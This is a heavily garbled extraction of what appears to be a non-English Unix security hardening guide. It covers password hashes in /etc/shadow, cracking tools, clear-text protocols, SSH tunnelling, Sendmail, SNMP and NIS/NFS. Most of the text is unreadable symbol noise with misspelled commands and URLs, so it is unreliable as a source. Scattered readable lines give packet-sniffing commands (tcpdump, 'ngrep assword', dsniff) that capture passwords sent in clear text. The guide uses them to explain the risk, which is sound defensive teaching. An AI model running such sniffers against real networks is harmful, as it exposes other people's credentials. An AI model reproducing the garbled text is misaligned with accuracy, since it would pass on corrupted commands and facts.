, N) = G 0 <
3\ P ? "
€
+
"
? "
% < P
!&
•
-,< = G Account
P
!&
6&
" ?
S
•
DY/ (,!
0-,< = G
, account E ?# $ F
,H ') = GX
6 &'(
4
5! , B
<R hashing
, "
-,< & ) -,<
N -, @
DY/ 2
N1
S
P
3
h
83 ( '$ hash ,
/
< ,6 3
SB
g
F) 2
)b
P! &
•
N1
$ hash
)E $
-, < 3 < $_
?@ ,6
•
6'
P! & Hashing
) ) ,
, Hashe ,
0
N& ]
P
!
)% !
0, 5
,
/
B
5!
-)8!
+
2 1
), ) 2
$
,
6-, 4,
-, < 2),
" I'
6 1G'
P
! & ,H ' ) = GX account
P
! & ,H ' ) = GX
6& ( #.
-
<
\ ' i: 21
)
a
0
•c
H ,F 7 , , e G
- 5 account
R4 S @ ^
,6 3
!89
0,6
,F , , ,
% !
9
" )-
) -,
) , K " U4 ? @]0,<
0_
F ) -, < = G
U 4 ,<
1G' #
,
P
!& 2
" U 4 ?5F
,63
P
[?@
, -,<
P
! & 2'
+
H
5 $
?#
3 1
)
- 3•
6% 5G1
$ F
?@
-
, 5 ,H
6& " - Y
0
P! &
)d*
7
P
!& ?
"
S
d
GP$
P! &
) ( #.
2
= G
W L3
("c
! ") *
) User ID
&
h
?@ ?
,K, @ '
0
?
) ,G ?
$, 5
DY/
,
2
P
!
6account ,
, ,F
? "
F
<d *
6 'F
)
"
- Y
<
,
) " g@
S
P! &
# )-
b
hash
) 6 'hash
d *
?,
N ], 5
I 5 MD5
crypt 5 , H
• Y%
P
!&
?
?@ "
:
5 $l '
,6 3
%.
?
, K ?#
"
etc/shadow % '0,
P! &
"
2
0_,
(E
? 5 -
3•
6
2
1
&
!89
6% 'V <
K6U )
I5
- 3• I 5 etc/shadow
u -,
N10 5 - Y &
SL b
P!
l'
6& ? 5
0
I 5 -, < + "
H
("c
- 3•)
hashes
N1?
0
3 A8 $ cracker
C
'
- Y hashes
S
4
/etc/passwd % '?, 3
F
3 % H root
3
- 3•W L3
?, 3 ?#
) 2 #<
N1" S
"
5 b
6account #
B
.
b < #
P
!&
) /etc/passwd
F) #P< ?
?5F
)
? "
#P<
I 5 ? 5F
5 L hashes
/etc/shadow
BH 0, <
b
P! &
P
!
! ". /0(123&
) -,< <R V <
!89 +
)
,<
K6account " #
- Y
6& " ?
'& , < h, / % H
6
,6 3 , , 2 e G
<
#40
+,
)% !
+
H
("c
25
d[Network Information SystemZ NIS
,
NIS
/
0
! 5E % < ) 6 '
#P
<
,G
,
(Mapping) U )
?#
7 !89 ) - 5 %5! 6U )
H Network File System (NFS)
, 6,
hash
P
!
P
!
% < NIS ,
6&
#4
6& C
85! ) 6 '?
) NIS+
P!
* ]l ' 6*
,
%#
),
!89
I #P< 6U )
3
6
? @ ?, 3 ?# ,
- 4 , ,F 6 *
6&
"
6% '$-, @ %5G / 9
5
I $ NIS " -, < "
N ], <P hashes
F
^
("c ^ P
2 )-
0,
H,, e G
C 5! LDAP
("c ( #.
# 4 ) I 0_ ,
u -,
?@" - Y ,
F
SL b
l 'b < #
2 56) -
%#
$_, ,F 6
0, 5
-, < "
,6 3
F)
F) $
) etc/shadow b
47 #
'
b
P
!&
=GX a I
- < $, - 5 V
5 ,H ?
j4
- Y
N ,G
3
$l ' # ) 0,<
1
), 5
? ,
0, 5
- Y
:
c 5G
C
6U )
#4)
)S
P
!
) N
("c
4 5
6
GP $
- 5
6&
7
L
" %/
P
!
6&
=GX %
<
SF
("c
? , b
0? "
%
)=
! 5E SL
g
6U )
, <P
456 123&
6%5G1
G?
a,<P S
"
P
! & ,H '
\'2 P
5/
6
e '
! " %&
"
$ 5
SL 7 B
5! #
) X
)
6
"
)% !
K6account )
6account
("c ) - 5
6U )
<
6? "
#P
< )% !
b
2
g
)? ,"
%
,
^
2
9
/
I'.
:
6A) " :
) X g
L
6&
?
< TP, &
) = GX e 'j 4 7
P!
) h, / ? # $ ,
account ? 5 TG' g
^
$ #P< )
! 5E
6& d *
3? "
6SL 0
,
P
!
hashes
)2
-
b
#.
5#.
? @ ( #.
K
S
&' * " - Y
?
P
P
!
d *
N F- 5
$, < -, < 3 < 5B
A" @ $ 6? "
?@
)-
-J )
"
3?
6
P!
!
M) / ) ,!
\X
)
5 $O 3
P
!&
?
("c
2
I 'L
c 9 <
6&
P
"
%5
Q
O*
N F2
0 <-
0 , K5 = G 3
-,< 3 < (
B' (
) " )@
( $O
W 3
(E
*
-
93
?@ d *
$
&
" $ "
" U
(8!
6&
,1
<P?@
"
I 5 ("c % 5G1
" ?
T
("c A"
6 #) h
&N F
E
P 785/ ?, < F
7
H?
-
- < # 2
?@ _
H I
("c 0
)@
?"
2 ), " U 4 0_‚
, P4
) 4 " ? 59
]
" ) -,<
1
) K5 - 3•
-, < F
I5 ?
I5
@
? !$7 P
!
6&
3•" M, 6] , <P %#
$ -, < = G
6 % 5G1
P!
P
!&
" ) - 3•
P
!
%5
#
/
) 5B
E ) O * W L3
5 MR/ $ 5B
-J)
password
d *
6&
P
= G
_pa$$w0rd], 5
-
6
-,< Y
P
!&
$_
-J ) M) / ) KP
Y1M) / "
("c
Y
3
M) /
• ,G
6&
O* ,
,
0_? @ =B*
P!
$ 5B 6M / 2 1
) 2' ]
)
#
:
0, < ,6 3 crack $
0,< -,< h PH
(E
],<
"password" (
K6
P!
SB
g 0
= G - . W L3
2 ?
H&
"
6
P
!& 2
M) / % ,P ( ,H C
'
A)
6A) " - Y
,6 3 785/ " \ 2
KP
Y1M) / "
I5 ) - 5
)6? "
?@
" ,G 0
' ? "W L3 )
P
!& d *
" - Y ) ,G
•
" ? 59
6?
' T /2 !
<) "
S
) ( #.
P
!&
7 B
5! $ & @
P 785/ (
6
6& ( E
0 5 crack
2
P
!&
$
T#<
A" @ ) S
,G
PF 62 )
T 5! " U 4
P!
6&
.
2
& 2
0
% 5! " U 4
P
!
6&
Npasswd " ,
6
U
: -, < d *
6 *
6
0, 5 - Y
. 7
]Cracklib " ,
*
?),
? ,
- <\ X
)
6
P
!
$
I5
I
#
0, 5
F) Enabled
,
crak ?@
6&
1/ Cracking
C, E
P!
("c , <
5 $? "
,<
P
'7 B
5! ?
("c
6" E
0
( E -, <
6&
("c
v 4
& _ E
2
"
6&
O * - . W L3
+H ) F
u
5 John the Ripper , (4lc4)10 phtcrack version
K6
P!
7
6&
? G ) stand-alone
- Y cracking
" - Y $= GX
b
& PAM-Enabled
P
!
2 )
u
P
!&
#P< )
L $
P
!&
%
7
K " U4
?
" ,
"
DY/ 2 <
Q0
6
N
" U4 0
5
b
6% 5G1
I K6 & " - Y ?#
? , " ("c " E S
S
6
- Y -,<
?
) Npasswd
5
l' 6
) ("c
F
N656 I 5 ("c
,
PAM-
S
1) U#
Q 0, 5 - Y
_ Crack
$
E
0
6%5G1
) A & l ' GX)
)C3 0
"]
K ? @
I $?
,K
& S
I5
N
K <)
0
hashes
0
P!
6&
#
0 #.
- Y etc/shadow/ "
F) hashes
I 5 A8 ) hashes
" - Y W L3
\
2 #
- 5 (N
P
!
6&
("c
"
0
3
P :
(E
2
LDAP ) NIS
6" E
$, -,
2 &N F 25
6 & ) 25
9
6" E
- 3•/etc/passwd
) NIS
?,
6
)
$, -,
#
H
6$, <
0
, 6 3 ? @ cracking
6*
5
•
DY/
$,
Z F LDAP
DY/ ? #
6&
-,<
"
) <
25
F) 25
2&N F 25
<,
6 &
g
9
6
- Y %
4 :
- Y MDS
N1"
2
0
- Y
6& ? 5 hash
P
!
5
7 L
N
I 5 Crypt 5 ,H
N1"
0
b
? @
0
DY/ (, ! 7
' ,63
?
$, < , 5 ,H ) #.
H, , e G
A" @
I
2 < (, ! $ N
DY/ ) ,<
P! &
<
4
P! &
" %P
H)S
6&
?
P
!
6&
:
2
0
1E
E
6 N4
W 3 K6 2 ) )
) X
62 ) " 0
V
? "
, ?@
%
has expired
O*
3
K6( 4 2 `
•
P $
5 - Y ?@ "
, account 60
P )
5#.
) , ,F P! &
u 7 ) X ) _ ' L 7 L -,< , 1 ] 1
)
B
1
$ 6 )
'
H
, P4
:
2
)?
)
("c) ( E
^P
P
!
N
1 -,< , K
3 - 56) "
P
!
& log in 2 1
)
,
&
/ ? 59 ?@ ?
# 54
"2
I K6
K6account MR/ )
1 P! 0
B'
4) K T
) T G' g
6account &5 0 < +H ) , Y
)
P! &
A" @ ?
6A" @ ?
U)
:
6&
<-
$, 5
, ,F 6account , # 4 0,<
?
b
%L
K ("c
- Y ?@ "
DY/
B
.
SB
g 0
("c 2
) " ?# 7
0
6&
P
!
, account 60 account
P )
$?
, Y 5! ( 5 -, 6,
'
0
MR /
P
!
?@ ?, 3 ?#
?
/
P $S
K (,! 0,<P
F
$
6&
6
B
5F " , -,< - 3•?@
P
!&
U)
% <
F) ? N
Your password
3
F
B
5G1
, <P
= GX
? "
("c
'
P
!
6&
)
P
-,<
6account ? )&' I 5
- 4 $,<
(N "
5 ?@" - Y
3
nB
G account MR /
0
"%
I
'
3
- Y $, - 5
Clear Text Servies
7
L $ U#
$
P
N&
=GX 0, 5
?#
P
!&
6
-,< - Y
5 - Y
?5F
3
6-
I?
telent
) FTP
bP
7 !89 d *
2
2
F
?# $S
? 5F
b
N
)( d *
0 , <, 6 3
Clear 7
2
_
L
7 !89
text plain
" )-
,
b
!89
SL
<] -,<
U#
< ?#
b
' ,B )-
6
"
R4 S @
)@ +5F
a,6
3
6N
6-
#P
< 6U )
?
,
) ))7
L $ -, 6 U )
-,< -
.
_login 7 !89 ]
$ F
<d *
0, 5
!89
I 5 8Q 0 )@ , 6 3
, 6 3 plain- text 7
!89
" ,G
) -,< E ^ P 7
6v 4 ) ? ,
6'
,5! ) - Y
$
sniffer
-, < K
2,
SB
g 0
N&
h / 7 !89
) #P
<
6U )
"
) 6 ' _ #P< ' -,6 ]
bP
B
.
#P
< 6U )
"
_
)
N6 ]
3 785/
)
6
P! &
3
1 " T),F
$, 5
1P $ Text
U)
Clear
7 4
Clear Auth
1
@
Content
FTP
21,20
Yes
Yes
$2
TFTP
69
Yes
N/A
$2
telnet
23
Yes
Yes
2
SMTP
25
Yes
N/A
$2
Pop3
110
Yes
Yes
$2
rlogin
513
Yes
Yes
2
HTTP
80
Yes
Yes
$2
?
6, K
, 6 3 TP,
?
^
2 c
h /
F$2
6-
FTP ) Telnet
I K6U )
T
L
7 !89 $ , <
" ,E - Y
2 7
,
6U )
< TP,
b
$
P
!&
clear text 7
,
0, 5 Z F $ , K
F$ ) - "
2
‚ / T3
- Y ? 5F
Clear text
I
?5F
-)8! , 5
? @" - Y
0,<
7 !89 % <
&1?),
%
a I YB* 7 , ,
7 !89 d *
)$
< $ ,L
-, < K
6*
5
Free/OpenBSD j
0, 5
SL
6U )
) 2 3@
^
l ' 6U )
"2
$:
"
3
+,
6
ZQ
6U ) ] l ' R4 S @ : d *
? 5F
b
_sniffer] -, < - Y
6&
5
5
]U
1) U#
$ e 'j 4 7 L $ _,<
+
clear
7
5 ) FTP )telnet ]
T) ,
2
I
",
)
" $-, < K U#
5 0_, <P
)(
3 - *1 7
$785/ ( E
- Y text Clear
<
L 7
$() *
0, 5
0
I 5 A) 2
&'(
! ". /0(123&
2t5: ) 2
[
# $ _text
? 5 T G'- . 0 5 - Y tcpdump $
"2
" 7 L clear text ^ P
a
F
2 1
), 0
6d *
I 5 $l '
#tcpdump-X-s1600
5 - Y & ngrep a
assword
6 ' #P<
-,
'
- .0
I
I N
) sername
6
I W 3 K N1
$ 15 / • & M) /
5 - Y
" ?
"
2
E F ?# $ l '
I 5 $ M) / 21
)] , 5
http://www.packetfactoty.net/projects/ngrep/
0_
"7 L l'
? 5 TG'
#ngrep assword
h
/
0
6-
d *
"2
I5
& 2 1
),
6% # ) 4 )
N \
h @" ?
l
'
? 5 TG'- . 0 5 - Y
:
2
$ Dsniff 0 5 - Y _ P
!& )( ]?
P! & ) ( z)"
? @ $ d . " U4 ) ( E
6& " ?
5 W L3
("c
POP3 ) Telnet )FTP
? )@
$l'
I $ E/ Plain text
,
0
, 63j
5
http://www.monkey.org/~dugsong/dsniff/
a
"7 L $l'
#/usr/sbin/dsniff
! " %&
level•Link
,
,<
N& %H ,/ ) End- To- End
N, # T G
•$ 7 # )
connection
6
N&
BH
m .1" 6%# ) 4 3
N& " - Y
+H ) , Y
?
$,<
5
_tunneling]
h
SSH
% H]
) Z F U#
)(replaces
6*
R 4 M :G ) T) ,
Q
l'
-, < "
- 4
5
I]
N&
( E SSl
OpenSSh
_ http://www.openssh.org/ h @
telnet,rloging,rsh) ) - " 7 9P
0
"2
_ HTTPS , POP3S
K6% # ) 4
) $ SSH:Secure Shell n 9 "
0
456 123&
- Y X11 )(pop3,SMTP
I
?@ " ?
I K6%# ) 4]tunneling
)
0, 6
2<
?
)
connection )
?@ ,
POP3 ? 5 tunnel - .
Z F & SSH
0
"
P POP3 -, 6 U )
a K5
F -,
U)
#ssh-L110:pop3.mail.server.com:[email protected]
- < localhost
7
4$ 6
7
4POP3.MAIL.server.com 7
7 L
# ) #1
# ) #1
4 -, 6 U )
4 -,
U)
$
] TCP110
T 5G T) M83
) 2 < 2 7 9P
5 S
110
2, _
0 (tunneled over SSH) 0,< ,6 3 ( E -,< &
stunnel " - Y tunneling
P
) _ openSSL Toolkit " - Y
0
] "
, * plain text 7) Y
'
N&
T) ,
- 4
6% / - "
N
#
SSL %# ) 4 $ l 'A) 0
6%# ) 4 ? 5 tunnel
0 5 - Y http://www.stunnel.org h @ " ?
I5
?@ ?
l'
'
Senmail
6
? 5
) ') ' $ T
# Sendmail 0
"
? G ?@ "
- Y $
785/ ?
(,!
:
# ) #1
)-
)?
?
- Y U
-
1)
4? ,6U)
- 5
? 5F
5 ,H % 1
, -,< ( E 785/ Q
:
2
-
6
SB
g
#
#1
Mail Transfer Agent 2 1
),
-
3 ?1
$ Sendmail
I 5 ?@ "
- 56
'
# ) #1 6
1
) M ,6"
-
-,6
$-,< SL
a 5 - <
?@
+" U „@
# Sendmail 0
^P
6*
,G
S
3 785/ "
patch
5 2,
CERT ADVISORY CA-2003-12-BUFFEROVERFLOW IN SENDMAIL
-CERT ADVISORY CA-2003-07-REMOTE BUFFER
-
CERT
ADVISORY
CA-2003-25
BUFFER
OVERFLOW
IN
SENDMIL
a 5
-,5! -)
)
?
SENDMAIL
bP 7 , , ) 7 :3
,
, 6 3 BUFFER OVERFLOW ?@
#4)
% , PC
8Q], <
T) \ 7 , , ")
< TP
B
!
7"
PATCHING (, !
) e 'j 4 ,
#4
"
Y 7 GP ,
B % ! 0_ # ) #1 6
S
2'
+"
) 5 ,H
- 1
@ &
6*
6% '" - Y
" - Y
() \ 7 , ,
C,5!
B
B
!
0
$() *
send mail " -, < S L *
0,<
- 5 U#
)U
+,
1 6*
TG'e 'j 4 7 L $l 'U )
+
*
K
)f ,
5 ,H *
-
) '
' j6 ?@
? 5 d*
I
0, 5 - Y
R4 S @ ^
X !
Send mail
<R
HS @e G
"
0
! ". /0(123&
6patch )
R 4 S @ ?& $ 9
< ,6 3
5 CP
l ' &'(
sendmail
" ,
, ,F
-,
patch
*
- 5<
Echo\$z\usr /lib/sendmail- bt-d0
7Y ,
$
,
#4
F
sendmail -, <
" ?
sendmail -,< d *
l'
K
*
2
3@ "
6
@
, <
http://www.sendmail.org/current-releaese.html h @
! " %&
4 sendmail DY/ ) "
a
$
F
6patch 2 3@ " ) Z
*
http://www.sendmail.org h @ " ?
]
% !
? ,
X !
9
25
2 3@
source code
patch
I
F
- 5 sendmail *
-, < K % !
456 123&
•
*
'
0
#
'
" %/
- Y
5 - Y
?
$_package
0 5 GF
U
1 6
?@
Q
1G') - P I
e
'j 4 7
•
L C 5! sendmail
mail -, 6 U )
? !
# @
/] U#
)
daemon
)
6
_
,6 * mail
SL
? # _ –bd ˆK ? 5 T G' g]0, K5
T
#4
:
sendmail
sendmail
1/
2
< ,6 3
etc/mail/sendmail.cf h @
F l ' 62 <
F) ? `56l ' 6
# 4 % ' mail reliy
,
b
<( E
c 5G )
C
^P
# ) #1
P
5
,
0
- <
sendmail.cf $ ,
< (
#4% '
0
.
"
"
Z F deamon 1/
$
!89 +
" ?
:
2
sendmail
0
%
H
•
("c #
/ ? 596, < ( E
, #4
a 5 - Y
http://www/sendmail.org/tips/relaying.html
http://www/sendmail.org/m4/anti_spam.html
T G' g e
3j 4 ,
'j 4 7
#4
L open relay ? # sendmail 8.9.0 *
?@ C, E $ % !
6
? ,
- 5 -, < K sendmail *
$% !
-, 6 U )
- Y
(, !]
( E
X !"
" - Y 7
W
" ,G0,<
0, 5
L3 2
("c
TG'
H
_realying]0
("c$_ N
-,
? 5 ˆ K ] sendmail , ,F *
*
, $ 5 ,H *
b
-, < K
$ sendmail ,
h @" ?
,
#4
#4
" - Y ? "
6% ' u W L3
^P
7 K
&F "
("c
6@
•
,
0
0 5 - Y http://www/sendmail.org/m4/readme.html
download
)
- Y pgp signature "
9
"
" g@
6*
integrity
<R
Q
# *
?),
ca-2002-28 h @ " ?
?
" E " ? 59
< H
0 <- Y
3O *
" sendmail
F +
?@ "
/S
? "
:
2
•
#
I
# 2
$
("c :
5 sendmail
0 5
source code
sendmail
B5# 7 !89
2
'
6trojan
I5 0 , 5
, - 5 sigm
I
6, B0 5 - Y CERT advisory
-, < - Y
http://www.sendmail.org/ftp/pgpkevs/ h @ " ?
I 5 MD5Checksum "
a 5 - Y
sendmail
'
PGP ?, '7
)@
,
0
- Y sendmail +P , INTEEGRITV
"
!89 +
" ?
7 !89 S
http://www.sendmail.org/secure-install.html
http://www.sendmail.org/m4/security_notes.html
gshapiro/secu rity.pdf http://www.sendmail.org /~
Simple network management protocol
(SNMP)
6- N
5
SNMP" - Y
, # 4) ) - " y
#
I 5 ?@ "
0 <
SB
g
- Y
$T
-
1
)$
6Access Point$ 6ˆ K $ 6 ) $ N4
" $SNMP0 <
#P
<
- Y $ #P
<y
) SNMP
6N
,
6N
TCP/IP
G
- Y
SNMP %# ) 4 "
I
#P< 7) Y
P ' 4
6( '784 2
I K 6N
, ) ,
6N
6-
"
2 ( 4 1P
I5
' )
)Y
0, 5
"
PG ), K (& # ) -,< 1P
,G
* ]SNMP
,
-, < - Y
6N
I 5 -,< - Y
B %
6A)
6A)
! B
5F " $ 6 ( 4
bP
R4 S @ ^
b
6( 4
3
-, < K
(E
H$l ' R 4 S @ ^
, ) ,
I 5 -, < - Y
" - Y
# 4 _U )
6 A) " [
? 5F 0
? '
9
SNMP
A) " [
, G 7c L. ) - P ),. SNMP" W 3
,1 b
), K
:
6A)
- Y
R4 S @ ^ 0 5 -,6 $03-2002-CERT…h @‘ ?
R4 S @ ^ 0
3
3
SNMP R4 S @ ^
0, <
7 K
&F - 5 _
6( 4
#4
% <&
*
$l '
? ,
" ] DOS \ " 7) Y 785/
SNMP
P 7 & E ) 7c@ 2<
-, < - Y
o
SNMP 5 , H
]
&
? G -,< &
$
SNMP 5 , H
6A) " [
N& S
6*
g’ V
6(
P e
%
! N "$
-, Y SNMP
5 i: j &' I 5 ? , , 1 "
< $h /
6-
^
$ SNMP
' )
!89
< TP,
I5
_?@
-, < % L
3 M, 6nH ) S
*
e
'j 4 7
T, " - Y
-, < K
P
6A) W L3
#P< 7 & E
" %
/f
%1
,
:
$"), )
F
2
- Y )
("c ,
G ) G
I 5P ^
u“
L 3 “7 L
3
) 7 !89 Z '
25F 0,<
,G ) TG' SNMP
5 SNMP
- 5< *
$SNMP
#4?
) ,<
- 5< *
d * SNMP0_, *
5 U#
785/ Q
$SNMP
-, < d *
U#
?@ - 5 ) SL SNMP *
U
T G'e 'j 4 7
SNMP , # 4
6
1) U#
% !
6
L $l '% # ) 4
SNMP
l ' R4 S @ :
$
P 785/ &1 @
,, e G
)-
6
- Y $ Bridges ) 6point access$ 6 N4
0
0
Q 0, <
^P
3 785/ &
c L. $ N
]0, <
“V
X !
] #P<
Q 0, <
K
6T, " - Y
,K
" ,G b
H$l '7 !89 " - Y
, 1
, 5
B!,
j & '
) 6
F
j , 4
R4 S @ ^
<0_, 5
O*
6( 4 , K
"
5 i:
L ? ,
H
6N
3 ]
6N
6 * 0_78#
- Y
R4S @^
PG
PG ) , K I 5
" $SNMP) )
<’
'j 4 A N0, <
6( 4 "
4 "
6A) " - Y (,!0, 5
<“
,
6*
P
5
SB
g
0,
#P
<% !
6
0 < ,6 3
=GX
6
)
X !
) 6N
H,, e G
R4 S @ d *
?
2
$ #P<
-,< %L
)
F
5 $ SNScan N 4
6N
0 5 - Y
)
SNMPSL
A)
P
) #5
- .
I5
"
h @n
0
9"
5
("c
7,
-
?
$
?
,
2
E F$?
F) N 4
0
I 5 ("c 7 B
5!$SNMP "
1 ("c
"
http://www.foundstone.com/knowledge/free_tools.html
'
W L3
@?
6 & " - Y ?#
(E
:
2
SNMPZ&F ) SL
7 L
- 4- ."
0
6 @ " U4
GF
9
SNMP?
(E
#
% !
T G'd *
2'
5
'
2
F)0
(E
w•w)w•p 67 4 )
("c 7 K&F "
6 @
I5 0
b <"
6"
F T/ “SNMP“
R4S
B1$ SNMP
@
0 5 - Y CERT-2002 03h @" ?
# n. 7
a < ,6 3
? G -, < - Y
] 13
W L3
$SNMPSL ) "
H,, )S @e G
F)•
'j 4SNMP Community
)e
_ P
!
")
F)•
community SNMP Y*
F)•
6 <
DY/ - .
$ l ' R4 S @ : %
DY/ I 5
0 5
a-,
,, )?
P@
?@ " - Y 7 ) X (,! 7
N& ) 6( 4 , K
I 5 $ SNMPv3
6
3
6, "
%
DY/
SNMP ? 5 TG' g•
P
T,
" - Y •
_? # 7
-, < K patch *
j*
?
$? ,
2 3@
$)
, 1 7 L*
6&
h,/ % H SNMP coomunity
R4 S @ : %
D Y/ 7 , H ?
4
*
"
6 @
] 6-
SNMP " - Y 7
S L $-,
•
,1 b
0 5 GF $ CERT Advisory CA-2002-03 5 5X
)TCP/UDP
,
^
w•w7
4], K5
SNMP agent
K6
9
),.
!89
SNMP
3
b
3
,
? &
w•p7
4
6N
"•
T
2#5 l ' J)0
("c T
$U#
B'T)
' " - Y 0
,
^
P
A R 4 W L3
? 5 V8
SNMP•
B
F) F 3 7 L
lYB
5! ?
y
6
6-
SNMP agentb
6
6
3
$
)
6
) TCP-Wrapper
P
(E
6
% !
agentb
) )
l '7 B
5!0_TCP/UDP
) X #
0
- Y
B' #P
<
?
6
1
)$,<
Q
0
(E
( E xined ,
& ?&
#4
agent
)
0 < +H ) [
h,/ % H
DY/
SNMP? 5 TG' g•
?@ " - Y 7 ) X (,! 7
I 5 $SNMPv3
N& ) 6( 4 , K
6 < %
P
" - Y •
T,
_? # 7
I5 W 3
"
$)
("c
2
0
- Y _
- ),.
)
) 7 L )-
)
( #.
6& ? G -, < - Y ] community
P!
h,/ % H g
& )
0
@ 3" ?
,
O*
u&
("c
:
2
0
(E
N
"W 3
6
F 7 # " - Y
•
P
!
6&
-, < '
- Y $http://www.sans.org/resources/idfaq/sanmp.phph @
) TCP/UDP
,
C
'
W L3
•
SNMP " - Y 7
*
0, < I
] 6-
^
w•w7
4], K5
B' ,
) )
6-
l '7 B
5!0_TCP/UDP
) X #
y
B' #P
<
# 40
(E
0, 6 ( E $-,< &5
$
,
-,< K
SNMP•
B
^
w•p7
F) F 3 7 L
6subnet 2 SNMP " E
'
4
6N
I5
SSH
(Secure shell)
% 'T
F$Login "
)7
l ' * ] OpenSSH
&'(
25
" U#
P
- Y $SSH Communication Security
R-
) telnet$ Ftp
6
,G
P
6=GX$ -,< - < *
&K/$ ? @ "
,
,G ) -
,, 2 5 0
b
_
U)
$l ' R 4 S @ :
_U
:
F
6=GX Q 0
F)
)-
56
?# $SSH
" - Y
N5
6=GX
,<
F
-,< K 7 !89 Q $"), )
] nix*) "), )
1
$U#
0, 5
Command
P B '8
i: ]
#P
<
SSH #
? `56 1
)$,<
K
&F 7c #< C
'
)? ,
(, !$
6
Q0
)_open-source 7 L
5
( ,H ? @ ? 5 M 9
R 4 S @ 2<
? ,6U)
)
6
E *
P
$SSH
5! U )
bP
0
?5F
SSH
6b.
SSH-, < "
- 4
6*
SSHS
%K ,
( N ) 6Patch
$("c "
# ) , #4
0,<
,
^P
< TP,
C L3
3 W 3 78#
)
SSH2
K 6% # ) 4
&
) HTTP$U )
$telnet
-, < -
-, 6 U )
…-,
^ P
C
$_ SSH2 SFTP
U)
L3
A"
R4S
4
Kc
F) ?@ ? #
2
#
"
@%
W
SSH2) SSH1
], < ? # -, 6 U )
) -,
4 (,!
3d *
6 *
R4 S @
, 5
6 &'(
F
" , G
$OpenSSHb
&
<
- <
# 2
6&
) clear text 7 L
-,
L3 2
U)
P
I
$ SSH1 % # ) 40
H
session
&
SSH2
#
)
0_
OpenSSH
"
2&N F , 5 ,H]POP3
? , % 1 2 , 0, <
],
N, #
@^
6A) a I ]rhost
6sessionS
% # ) 4 " - Y $ #P< )
:
R 4S
;! _rlogin) rcp rsh$, K
7 !89 T
)- P
d *
("c0_
SSH *
("c
F) & Z Q
OpenSSH ?
-,< E
6%
4%
CERT
2002-23h @ " ?
$ 9
l ' * ] OpenSSH " - 1
@ *
I 5 0,
7 K
&F "
6 @
pqqp T
0 5 - Y Advisory
) ' 6S @ ;! ) A
%
3
6
? "
R 4 S @ (, ! " ? 59 ) :
I 5 0, <
trojan-horse
_
2
7 !89 S
- Y http://www.openssh.org/txt/trojan.advh @ " ?
$l '- 1
@ *
0 5
,, e G
-,< K
* ]?@ " ,G OpenSSH 3.3 ?@ )
U
) SSH Communication Securitys SSH 3.0.0
% !
6
1 U#
*
6
)_version 3.6.1$pqqp T
Z F ) S L _version 3.5.2- 5 < pqqs T
-, < K
0 < ,6 3
* ] ?@ " , G
HS @2 e G
$
R4 S @ d *
*
R4 S @ W L3
-,< SL
U)
*
("c
- 5< " $“ ssh-v“
) - " d *
6*
$S
N 4
?
:
2
& $ ScanSSH0,
Patching (,! % 1
,
0,<
- 5< ^ P
ScanSSH *
" - Y
0
#P
< 6h @
2 3@0, 5
K
4
6Z
0 5 SL
?@
http://www.monkey.org/~provos/scanssh/h @ " ?
'
a
Patch2 3@
)
R4 S @SSH? , 6
! " %&
0,
(E
- @
< &) j 4 ? , 6 U )
-, < K pqqw T
0 5
F
I5 , Y
1
$ ScanSSH :3
"
?
- .
F
"
*
$l ' R4 S @ : %
2
3@
?@ )
0, < 2t5: ?@ *
'
DY/ I 5
)SSH *
- 5 OpenSSH )SSH #
$,< -,< SL $% !
)
openSSH
456 123&
% !
-, 6 K
"
9
2 3@ SL " $OpenSSH" - Y 7
•
SSH1 G
:
0,
0,<
? ,
-
*
P
,
TL ) I
-
*
6 & "
6
-, 6 U )
S!
5 $" E ?
!
j &'
0
6A) $?@
I5 ? @ " ?
, # 4•
U)
S
2
0, 5
U)
N 4
)•
W L*
,K
, #4
SSH? ,
2#5 -,
"
I 5 0,6 d *
,Y :
5
5/
rsh
2
NO , $SSH , # 4 % ' FallBackToRsh, B
P
-)8! S
,6 3
- 4 *
)? @" - Y
6 ) ?
- Y O B
:
2#5 $DES3A) ]
L
F
TL ? "
2`
7
3 5L -, @
), . ? # 0, 6 ( E
0
0
F)
$SSH-,< "
6
2<
" - Y )
) <,
! 5E
F
6 & "
SSH
SSH2 G
I
# 4,
G ), 51 /•
SSH2 SSH1 * $
Z
- Y DES3%
2, 0_,< -,< '
3
P
( #.
N& " •
blowfish
I
9
*
" & -,< ( E
e 'j 4
N& $ 7 B
5!
+ ,I
!
+
; Q
NIS/NFS
) $(Nis)Network information Service)(nfs)Network File System
U)
Sun
) $ NFS0, <
<b
#P<
F
) V < ? # l 'U )
6 '• &
6
6
2
" - Y
7) Y
6
% ' I
,
6% ' Q
)
u T 5! ? # $NIS & 5
maps]
7
u T5! 7 ) X (,!]0, 5
?#
^
6% 'V
0
-,
) L*< 6
$ nis0
7
U#
6 #P
<
I 5 Microsystems
<
"
-
)
4 ) / 9$U#
F
2 % 'V <
,
6% '
A) $ NFS0
,
-,< +"
, 0, 5
-,< - Y
!89
U)
6 'hosts)passwd
6 '_ !89
] :
7 !89 K $NISM,62 5 0_ #P
<
"
F
6
I
6
5 group)passwd
?
,K
& 5
=GX C
8Q]
NFS I #P< 6U )
B'0
I5 ? @ "
,G
? @" ,
?5F
3 ?1
,, e G
6
"
H
NISb
I K6 &'(
" - Y
I 5 NIS
"
(& # 0
? 5F
,K
) 6, "
0,<
dos$buffer
S
', 6? G
F
6- Y/ " - Y Z
-, < - Y
- Y
patching)NIS)NFS 6U )
$S
F
6
0
_?
F
3 785/
, 63
) -
!89
)-
B
. 7
3W 3
F -
?5F
S
6=GX
)
?
H ypcat
j 5
P! &
$() *
- 5 U
0, <
1) U#
NFS )NIS
"
+,
6
5 CP
TG'e 'j 4 7 L $ l ' 6U )
+
6U )
:
,F
) ) -
0, <
K NIS)NFS " *
-,
"2
(E
R4 S @
0, - 5 - Y
6U )
)-
\ " -, < ( E 785/ Q 0, -,
# 4 (, ! 7
% '
$NFS)NIC
56? 5F $ l ' 6U )
, K
6maps]
_ I
6=GX
, G 785/$ ? @ " - Y
overflows
-
_ <
0,
! ". /0(123&
R4 S @ d *
I5
a
K6 *
5 0-,
), , e G
,1 b
,< -,
-,< K
SL ? @ )
F patch 2 3@
" - Y
NIS *
I 5 0 ' 6 @ -,< SL NFS *
j 5 &
NFS *
6@
- 5< l '
•
patch 2 3@ SL " ? 59 )
rpc.mountd-version
- 5 <"
4
6*
Q
) -,
(N
0 < ,6 3
HS @
- 5< " ?
] 5 - Y ypserv-version
" ?
0_
,6 3
(N
R4 S @ ^
0
R4 7
N
4
" ?
$ &'(
, ,F 6=GX W L3 , "c
a
4
NIS map
?
2
0 F
P!
a
4
NFS S
6" E ) netgroups$?
% '
& ?
7 L -,<
3
I5
